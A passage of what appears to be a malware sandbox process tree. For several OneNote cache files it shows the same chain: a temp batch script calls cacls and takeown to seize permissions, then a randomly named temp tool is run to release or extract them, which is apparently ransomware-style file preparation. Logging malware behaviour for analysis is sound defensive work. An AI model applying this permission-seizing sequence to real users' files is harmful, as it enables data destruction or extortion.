                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7368
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000H.bin""
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2284
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000H.bin" /E /G Admin:F /C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:5312
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000H.bin"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:300
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "0000000H.bin" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:280
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          lrEU2Z2i.exe -accepteula "0000000H.bin" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:276
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:5004
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000S.bin""
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:6796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000S.bin" /E /G Admin:F /C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2412
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000S.bin"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2840
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "0000000S.bin" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:6988
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    lrEU2Z2i.exe -accepteula "0000000S.bin" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:6940
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7404
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000016.bin""
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7956
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000016.bin" /E /G Admin:F /C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:4216
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000016.bin"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:8220
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "00000016.bin" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7540
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              lrEU2Z2i.exe -accepteula "00000016.bin" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7740
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6004
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000050.bin""
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7400
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000050.bin" /E /G Admin:F /C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7964
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000050.bin"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:5548
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "00000050.bin" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:5232
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          lrEU2Z2i.exe -accepteula "00000050.bin" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:3368
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7200
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007E.bin""
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7264
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007E.bin" /E /G Admin:F /C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:8056
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007E.bin"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7260
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "0000007E.bin" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:8048
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    lrEU2Z2i.exe -accepteula "0000007E.bin" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7460
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:6268
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007O.bin""
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:5352
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007O.bin" /E /G Admin:F /C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7468
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007O.bin"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7440
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "0000007O.bin" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2692
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              lrEU2Z2i.exe -accepteula "0000007O.bin" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7008
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:4752
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008D.bin""
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7632
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008D.bin" /E /G Admin:F /C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5368
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008D.bin"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5888
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "0000008D.bin" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:8532
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    lrEU2Z2i.exe -accepteula "0000008D.bin" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7656
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7608
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008N.bin""
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:3428
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008N.bin" /E /G Admin:F /C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:5904
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008N.bin"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7660
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c lrEU2Z2i.exe -accepteula "0000008N.bin" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:6040
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              lrEU2Z2i.exe -accepteula "0000008N.bin" -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7748
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\lrEU2Z2i.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              lrEU2Z2i.exe -accepteula -c Run -y -p extract -nobanner
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6084
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Egz4LZYv.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000093.bin""
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7768
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000093.bin" /E /G Admin:F /C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7732
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000093.bin"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:652
